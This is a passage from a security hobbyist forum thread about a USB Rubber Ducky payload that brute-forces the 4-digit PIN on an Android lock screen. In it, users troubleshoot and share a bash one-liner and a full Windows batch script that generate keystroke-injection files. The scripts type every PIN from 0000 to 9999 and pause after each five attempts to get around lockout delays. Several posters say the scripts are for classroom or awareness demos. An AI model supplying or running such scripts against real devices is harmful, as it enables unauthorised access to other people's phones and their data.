Jump to content


Photo

[Payload] Android Brute Force 4-digit pin


  • Please log in to reply
45 replies to this topic

#41 shrekthemp

shrekthemp
  • Members
  • Newbie

  • 4 posts

Posted 01 October 2015 - 09:48 PM

I am new to this program.script and USB Ducky.  We use windows.  I went to the online tool USB ducky toolkit to implement the code referenced above.  Can someone help me recode it to work in the ducky toolkit.  I would like to show this exercise on our training phones in class.  Thank you.



#42 Mr-Protocol

Mr-Protocol
  • Root Admin
  • Hak.5 Packet Ninja

  • PipPipPipPipPipPipPipPipPipPipPipPip
  • 4,061 posts
  • Gender:Male

Posted 02 October 2015 - 04:43 PM

What OS are you using? And is it the code from the first post? 

 

The bash code from the first post cannot be directly imported into the online compiler. Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class.


Mr-Protocol @ irc.hak5.org #hak5
Mr-Protocol @ chat.freenode.org #hak5

 
Im just watching a bad dream I never wake up from. -Spike Spiegel

 

https://keybase.io/mrprotocol

 

BitCoin: 1M85SAg2Ax2NQyq5hCdonbTw45sPT19aBY


#43 shrekthemp

shrekthemp
  • Members
  • Newbie

  • 4 posts

Posted 07 October 2015 - 07:42 PM

"Although if you trust me as forum admin, all around good guy, etc :P I can compile the code and send you the .bin to use for your class" 

 

I am using it on Samsung note phones with 4 digit pin set.  It would be awesome to have you create the bin for me.  I still would like to learn how to recreate the script in the toolkit if possible.  My issue is the number creation I think.  Thanks



#44 Siem

Siem
  • Members
  • Newbie

  • 1 posts

Posted 15 October 2015 - 10:31 AM

I am running CYGWIN and am having some problems with the script. Can anyone see what is happening with the script? Here is my command line.

C:\Users\UserName\Desktop>echo DELAY 5000 > android_brute-force_0000-9999.txt; ec
ho {0000..9999} | xargs -n 1 echo STRING | sed '0~5 s/$/\nWAIT/g' | sed '0~1 s/$
/\nDELAY 1000\nENTER\nENTER/g' | sed 's/WAIT/DELAY 5000\nENTER\nDELAY 5000\nENTE
R\nDELAY 5000\nENTER\nDELAY 5000\nENTER/g' >> android_brute-force_0000-9999.txt
C:\Users\UserName\Desktop>dir android*
Volume in drive C has no label.
Volume Serial Number is 2499-C7D7
Directory of C:\Users\UserName\Desktop
07/07/2012 01:03 AM 165 Android Paths.txt
08/30/2012 08:00 PM 50 Android SDK Path.txt
12/09/2012 02:26 PM 63 android_brute-force_0000-9999.txt
3 File(s) 278 bytes
0 Dir(s) 831,818,436,608 bytes free
C:\Users\UserName\Desktop>type android_brute-force_0000-9999.txt
DELAY 5000 ; echo {0000..9999}
STRING
DELAY 1000
ENTER
ENTER
C:\Users\UserName\Desktop>

Instead of using Linux terminal, I made a Batch script for this, it does the same thing, 
Here is the code;

@echo off
setlocal
set NUM=0
set COUNT=0

echo REM Author: Siem>>input.txt
echo REM Idea taken from: Darren Kitchen
echo REM Description: Bruteforcer>>input.txt
echo DELAY 1000>>input.txt
echo.>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

:START
cls
IF %COUNT% EQU 5 (set COUNT=0 & call :WAIT)
IF %NUM% LEQ 9 (set ZERO=000)
IF %NUM% GTR 9 (set ZERO=00)
IF %NUM% GTR 99 (set ZERO=0)
IF %NUM% GTR 999 (set ZERO=%)
IF %NUM% EQU 9999 (pause & exit)
echo DELAY 500>>input.txt
echo STRING %ZERO%%NUM%>>input.txt
echo ENTER>>input.txt
echo %ZERO%%NUM%
set /a NUM=%NUM% + 1
set /a COUNT=%COUNT% +1
goto START

:WAIT
echo.>>input.txt
echo REM Wait 30 seconds>>input.txt
echo DELAY 30000>>input.txt
echo ESC>>input.txt
echo DELAY 500>>input.txt
echo STRING 0000>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo DELAY 500>>input.txt
echo BACKSPACE>>input.txt
echo.>>input.txt

You can change the delay a bit, I am still testing it, but this echos 0000..9999 without using Linux.

 

~Siem



#45 adamxk

adamxk
  • Active Members
  • Hak5 Fan

  • PipPip
  • 19 posts

Posted 17 October 2015 - 06:29 PM

why isn't this on the wiki?



#46 LoreLorm

LoreLorm
  • Members
  • Newbie

  • 1 posts

Posted 05 November 2015 - 10:44 AM

Hi,

 

I'm new to the forum and wondered if someone might be able to help me. I've been trying to get the Android brute force working for an awareness demo; however I'm not having much luck. I ran the bash script on the original post and created a new inject.bin but nothing happens when I insert it into the phone!

Any help would be gratefully received.  

I have Samsung GT-S5830i Android version 2.3.6

 

Thanks






0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users